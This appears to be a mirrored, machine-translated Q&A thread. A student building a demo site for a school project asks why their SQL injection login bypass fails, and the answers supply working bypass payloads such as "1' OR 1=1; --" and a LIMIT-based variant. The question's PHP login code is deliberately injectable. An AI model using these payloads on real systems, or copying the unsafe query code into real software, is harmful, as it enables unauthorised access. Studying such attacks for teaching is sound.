我的SQL注入似乎不起作用?
[英]My SQL injection doesn't seem to work?
问题描述
I have to do a project for school about a number of different web vulnerabilities (SQL, XSS, CSRF, etc), and I've made a very simple website to demonstrate the attacks on. 
我必须为学校做一个关于许多不同的Web漏洞(SQL,XSS,CSRF等)的项目,我已经建立了一个非常简单的网站来演示攻击。 But for some reason, I just cannot get SQL injection to work by attacking the login. 但由于某种原因,我无法通过攻击登录来获得SQL注入。
Here is the simple login code: 这是简单的登录代码:
$query = "SELECT * FROM customer WHERE cMAIL='$cmail' AND cPWD='$cpwd'";
$res = mysql_query($query) or die(mysql_error());
echo $query . mysql_error();
$count = mysql_num_rows($res);
if ($count == 1) {
echo " Reached target!";
session_start();
$_SESSION["cmail"] = $cmail;
$_SESSION["cpwd"] = $cpwd;
} else {}
A lot of the echo stuff is so I can follow the injection to see what happens, but it gives me weird results. 很多回声的东西是这样我可以按照注射来看看会发生什么,但它给了我奇怪的结果。
If I login as one of the customers; 如果我以其中一个客户身份登录; username: jjones@mit.edu, password = 123abc, it gives me the expected response: 用户名:jjones@mit.edu,密码= 123abc,它给出了我预期的响应:
SELECT * FROM customer WHERE cMAIL='jjones@mit.edu' AND cPWD='123abc' Reached target!
This is what it echos in the browser, just to be clear! 这就是它在浏览器中的回声,只是为了清楚!
And session is created for jjones. 会话是为jjones创建的。 But if I do this: username: 1' OR '1'='1, password:(empty) it echoes this: 但如果我这样做:用户名:1'或'1'='1,密码:(空)它回应:
SELECT * FROM customer WHERE cMAIL='1' OR '1'='1' AND cPWD=''
No errors or anything. 没有错误或任何东西。 I've echo'd $count and it says 0 rows are selected from the database. 我已经回显了$ count,它说从数据库中选择了0行。 So the injection is sound, but I'm not getting any rows based off the query. 因此注入是合理的,但我没有根据查询得到任何行。 How do I solve this? 我该如何解决这个问题?
4 个解决方案
解决方案1
3 已采纳 2013-12-15 00:50:51
You could produce 你可以生产
SELECT * FROM customer WHERE cMAIL='1' OR '1'='1' LIMIT 0,1;# AND cPWD=''
With user: 有用户:
1' OR '1'='1' LIMIT 0,1;#
And password empty. 密码为空。
解决方案2
2 2013-12-15 00:48:17
To bypass login check, you should build a query that meet the following specification: 要绕过登录检查,您应该构建符合以下规范的查询:
- Limit to only one row. 限制到只有一行 。 (LIMIT) (限制)
- WHERE clause always be true. WHERE子句始终为true。 (boolean calculation) (布尔计算)
So @Ignacio Ocampo 's solution is exactly the right one. 所以@Ignacio Ocampo的解决方案恰到好处。
BTW, there's one thing you should consider in SQL injection. 顺便说一句,在SQL注入中你应该考虑一件事。 If magic_quotes_gpc enabled, PHP will automatically convert ' to \\' . 如果启用magic_quotes_gpc,PHP将自动转换为' \\' 。
解决方案3
0 2013-12-15 00:47:42
You can demonstrate SQL injection in your example by setting username to 您可以通过将username设置为来演示示例中的SQL注入
1' OR 1=1; --
This will make your final query : 这将使您的最终查询:
SELECT * FROM customer WHERE cMAIL='1' OR 1=1; -- AND cPWD=''
This comments out the password check. 这注释了密码检查。
解决方案4
0 2013-12-15 00:51:09
You have to put something down for the password field. 你必须为密码字段放下一些东西。 Right now the query must match password to blank (""). 现在,查询必须将密码与空白(“”)匹配。
Something like the following will make you a smart bad-guy 像下面这样的东西会让你成为一个聪明的坏人
Username: 1' OR '1' = '1
Password: doesntmatter' OR '1' = '1
This translates to 这转化为
SELECT *
FROM customer
WHERE cMAIL='1' OR '1'='1'
AND cPWD='doesntmatter' OR '1' = '1'
声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.